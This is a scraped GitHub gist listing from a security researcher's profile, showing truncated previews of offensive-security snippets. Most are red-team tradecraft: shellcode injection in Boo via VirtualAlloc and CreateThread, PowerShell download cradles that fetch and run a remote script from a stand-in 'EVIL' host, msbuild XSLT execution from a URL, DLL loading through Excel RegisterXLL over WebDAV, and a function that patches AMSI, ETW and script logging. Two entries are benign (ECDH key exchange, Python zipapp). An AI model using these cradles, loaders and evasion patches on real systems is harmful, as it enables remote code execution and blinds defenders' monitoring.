Marcello byt3bl33d3r

🧛
This shit ain't nothing to me man
View GitHub Profile
@byt3bl33d3r
byt3bl33d3r / ecdh_eke.py
Created October 13, 2018 02:55
ECDH Encrypted Key Exchange (Python 3.6+)
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from secrets import token_bytes
class DiffieHellman:
    def __init__(self):
@byt3bl33d3r
byt3bl33d3r / shellcode.boo
Last active December 7, 2018 22:57
Boolang shellcode injection via CreateThread/WaitForSingleObject
import System.Runtime.InteropServices
from System import IntPtr
[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int:
    pass

[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
    pass
@byt3bl33d3r
byt3bl33d3r / DownloadCradles.ps1
Created December 13, 2018 02:25 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@byt3bl33d3r
byt3bl33d3r / LoadXSLFromMem.cs
Created June 11, 2019 22:00 — forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace TryCOMXSLLoad
{
    class Program
@byt3bl33d3r
byt3bl33d3r / xslt.proj
Created June 11, 2019 22:02
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
  <Target Name="Example">
    <ItemGroup>
      <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
    </ItemGroup>
    <PropertyGroup>
      <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
    </PropertyGroup>
    <XslTransformation
      OutputPaths="output.%(XmlFiles.FileName).html"
@byt3bl33d3r
byt3bl33d3r / BooBeacon.cs
Created June 17, 2019 00:07 — forked from Ne0nd0g/BooBeacon.cs
C# w/ embedded Boo lang compiler to execute Boo lang script that executes provided shellcode
using System;
using System.Text;
using System.Reflection;
using System.Collections;
using System.IO;
using System.IO.Compression;
using Boo.Lang.Compiler;
using Boo.Lang.Compiler.IO;
using Boo.Lang.Compiler.Pipelines;
import System
import System.Runtime.CompilerServices
import System.Runtime.InteropServices
import System.Runtime.InteropServices.ComTypes
public struct FILETIME:
    public dwLowDateTime as int
    public dwHighDateTime as int
@byt3bl33d3r
byt3bl33d3r / ExcelXLL.md
Created September 14, 2019 07:58 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

@byt3bl33d3r
byt3bl33d3r / Invoke-LetMeIn
Last active January 16, 2022 23:42
Patch AMSI, ETW and PS ScriptBlock + Module logging (⚠️ not Transcription logging! ⚠️) using an embedded Boolang Compiler within Powershell
function Invoke-LetMeIn
{
$BooLangDLL = @'
@byt3bl33d3r
byt3bl33d3r / zipapp.md
Created October 21, 2019 23:10 — forked from lukassup/zipapp.md
Python zipapp

Python zipapp web apps

What's a zipapp?

This concept is very much like .jar or .war archives in Java.

NOTE: The built .pyz zipapp can run on both Python 2 & 3 but you can only build .pyz zipapps with Python 3.5 or later.

Initial setup